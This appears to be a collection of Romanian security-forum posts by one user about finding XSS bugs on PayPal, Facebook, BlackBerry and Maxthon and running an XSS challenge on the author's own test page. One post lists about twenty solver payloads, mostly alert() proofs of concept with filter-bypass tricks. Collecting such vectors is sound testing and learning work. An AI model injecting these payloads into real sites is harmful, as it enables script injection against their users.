florin_darck

Am gasit ceva foarte interesant. Poate fac diseara un show off

Stored xss #lol http://i.imgur.com/66qLAUV.png ON : nu stiu zau cine o sa de bani sa vada mirese antena1 bla bla care se gasesc si pe net de obicei. Daca aveau seriale ca cei de la voy0 poate mergea treaba. Cred ca o sa dea faliment curand

Target : https://www.paypal.com/ro Type : Stored XSS Nu este cel gasit de akkilion ! Sunt constient ca sunt sanse mari sa fie duplicate.. dar poate am noroc

La multi ani si bafta in continuare !

Maxton folosesc si eu de un an si mi se pare mult mai rapid ca Google Chrome + ca are multe functii utile prin el. @Matt a durat doar vreo 3-4 zile problema, baietii s-au miscat repede si au scos update

If you wanna die

Thanks ! LE: dau si PM ?

Dupa cum v-am promis, postez si rezolvarile fiecaruia dintre voi pentru a vedea si ceilalti cum se rezolva etc, etc. In ordinea PM-urilor primite. 1.H3xor - <input autofocus onfocus=alert(1)> 2.Danyweb - <Script>alert(1)</Script> 3.qwerty12 - <isindex action=javascript:alert(1) type=image> 4.adyttza26 - <script a="">alert(1)</script a> 5.Toshib4 - <input onfocus="alert(1)" autofocus onmouseover="alert(1)" style="display:block;position:absolute;height:100%;width:100%;opacity:0"> 6.Th3me - <a onclick="alert(/th3z0n/)" href="">th3z0n</a> 7.Sega - <a href=javascript:alert(1)>ffffffffffffffff 8.jamik - <;/script>;<;script>;alert(1)<;/script>; [Works on chrome] 9.m1ndst1k - <scr<script>ipt>alert('RST XSS');</scr</script>ipt> 10.SilenTx0 - <a href=javascript:alert(1)>silent</a> 11.yo20063 - <a href=x onMouseover=alert('yo20063');><font color="green">yo20063</script> 12.yoyois - <SCRIiPt> alert("WTF Cel mai ciudat xss - @yoyois")</SCRiIPt> [Works on chrome] 13.hackerika - <a onclick="alert('hackerika')" href="">hackerika</a> 14.Renegade - <input onclick=alert("Renegade")> 15.Andys - <a onclick="alert('asd')" href="">asd</a> 16.StoNe- - <input type="text" onclick=alert(1)/> 17.Zeeko - <scriPt>alert('1')</scriPt> 18.StrXt - <a href='' onClick='javascript:alert(1);'>fuck it</a> 19.VaD_SuNeTe - <input type="text" AUTOFOCUS onfocus=alert(1)> Vectorul cu care am testat eu prima data : <keygen/onfocus=alert(2) autofocus> Felicitari tuturor care au reusit sa il rezolve. Toate cele bune ! Challenge CLOSED !!!

Astept PM cu rezolvarile. Cine nu imi da pm nu se ia in considerare. Nu stau sa ma rog de fiecare sa imi dea dovada

Am pus challenge-ul pe un sub la 3owl.com HI2=shit

Target : http://florin-darck.3owl.com/challenge/xss.php Parametru : ?x= Level : easy-medium Cerinte - postati o imagine cenzurata - PM cu link-ul - nu dati hint-uri Proof http://i.imgur.com/LLxqOtZ.png Aseara m-am dat sa invat ceva php pentru a face in challenge XSS. Nu le am cu php asa ca filtrele sunt destul de dezordonate.. o sa intelegeti voi. La sfarsit o sa postez cine ce vector a folosit. Pentru a vedea si cei mai incepatori cum se rezolva si pentru "colectionarii" vectori. Succes ! Solvers 1.H3xoR 2.danyweb09 3.qwerty12 4.adyttza26 5.Toshib4 [PM] 6.Th3me 7.Sega 8.jamik 9.m1dst1k 10.SilenTx0 11.yo20063 12.yoyois 13.hackerika 14.Renegade 15.Andys 16.StoNe- 17.Zeeko 18.StrXt 19.VaD_SuNeTe Challenge CLOSED ! Rezolvarile in ultimul post

Era ?ref=1 sigur. am vazut exact cand a facut threadul @Martin24 stai jos, ai 2

In aceeasi situatie si eu

Am vazut pe twitter acum in jur de un an un tip care a luat 500$ parca.. deci e posibil

Self XSS PS: daca nu iti "place" ca e self sau alta problema muta-l la show off trash, unde vrei tu

Target : http://facebook.com Vulnerability : Self XSS Author : florindarck Status : Fixed Vpoc

Din pacate "not for bugs in web applications" ..

Target : http://bugtracker.maxthon.com/ Level : maybe medium Cerinte - postati o imagine cenzurata - nu dati hint-uri Se accepta doar rezolvarile care merg pe chrome Rezolvarea challengeului nu necesita account. Proof http://i.imgur.com/Ow5j9sN.png Solvers 1.Sega 2.danyweb09

Cel mai bun site de facut bani Locuri de munca | BestJobs

Dupa cum spune si titlul vand license key pentru Bitdefender Total Security 2013, valabil un an. L-am primit in urma raportarii unui xss in bitdefender.com, dar avand in vedere ca eu nu prea lucrez cu programe suspicioase sau din surse nesigure, prefer sa raman la versiunile free. Avand in vedere ca pe site costa 70 $ il dau la jumatate de pret. Asa ca Price : 35 $ only paypal

Da stiu ca sunt mai multe in zona aia. Mi-au dat acordul sa il fac public deoarece lucreaza la un nou script pentru acel subdomeniu si va fi schimbat total

Da

Target : Cell Phones, Smartphones & Mobile Phones from BlackBerry.com Author : florindarck Proof : http://i.imgur.com/ax7jKHw.png Reward : Hall of Fame

Ce recompensa au zis ca iti dau ? OFF: n-ai putut filma cu un program in plm..

Bine baieti. Cine il face sa mearga pe chrome in trec intr-un top separat